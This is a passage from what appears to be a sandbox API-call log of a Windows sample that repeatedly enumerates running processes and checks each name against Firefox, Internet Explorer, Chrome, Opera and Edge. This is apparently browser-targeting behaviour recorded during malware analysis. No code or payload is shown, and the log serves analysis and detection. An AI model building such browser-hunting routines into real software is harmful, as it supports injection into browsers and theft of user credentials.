th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0180.080] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0180.080] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0180.080] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0180.080] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0180.080] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.080] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0180.080] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0180.080] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0180.080] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0180.080] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0180.080] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.080] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0180.081] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0180.081] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0180.081] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0180.081] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0180.081] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.081] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0180.081] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0180.081] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0180.081] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0180.081] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0180.082] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.082] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0180.082] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0180.082] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0180.082] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0180.082] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0180.082] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.082] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0180.083] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0180.083] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0180.083] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0180.083] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0180.083] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.083] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0180.083] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0180.083] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0180.083] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0180.083] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0180.083] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.083] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0180.084] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0180.084] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0180.084] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0180.084] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0180.084] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.084] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0180.084] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0180.084] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0180.084] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0180.084] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0180.084] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.084] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0180.085] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0180.085] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0180.085] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0180.085] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0180.085] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.085] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0180.086] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0180.086] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0180.086] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0180.086] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0180.086] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.086] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0180.086] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0180.086] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0180.086] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0180.086] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0180.086] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.086] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0180.087] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0180.087] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0180.087] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0180.087] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0180.087] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.087] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0180.087] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0180.087] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0180.087] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0180.087] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0180.087] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.087] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0180.088] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0180.088] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0180.088] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0180.088] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0180.088] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.088] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0180.088] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0180.088] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0180.089] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0180.089] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0180.089] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.089] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0180.089] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0180.089] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0180.089] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0180.089] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0180.089] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.089] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0180.090] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0180.090] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0180.090] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0180.090] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0180.090] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.090] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0180.090] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0180.090] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0180.090] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0180.090] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0180.090] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.090] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0180.091] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0180.091] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0180.091] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0180.091] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0180.091] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.091] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0180.091] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0180.091] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0180.091] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0180.092] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0180.092] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.092] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0180.092] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0180.092] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0180.092] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0180.092] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0180.092] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.092] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.093] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.093] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.093] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.093] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0180.093] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.093] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0180.093] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0180.093] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0180.093] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0180.093] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0180.093] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.093] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.094] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.094] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.094] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.094] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0180.094] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.094] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0180.094] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0180.094] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0180.094] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0180.095] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0180.095] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.095] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.095] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.095] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.095] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.095] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0180.095] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.095] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.096] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0180.096] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0180.096] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0180.096] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0180.096] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.096] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0180.096] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0180.096] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0180.096] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0180.096] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0180.096] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.096] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0180.097] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0180.097] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0180.097] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0180.097] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0180.097] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.097] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.097] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0180.098] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0180.098] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0180.098] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0180.098] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.098] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.098] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0180.098] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0180.098] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0180.098] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0180.098] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.098] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.099] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0180.099] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0180.099] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0180.099] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0180.099] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.099] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.099] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0180.099] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0180.099] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0180.099] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0180.099] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.099] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0180.100] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0180.100] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0180.100] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0180.100] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0180.100] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0180.100] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0180.100] CloseHandle (hObject=0xe8) returned 1 [0180.101] Sleep (dwMilliseconds=0x3e8) [0181.109] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0181.111] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.111] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0181.111] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0181.111] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0181.111] lstrcmpiA (lpString1="[System 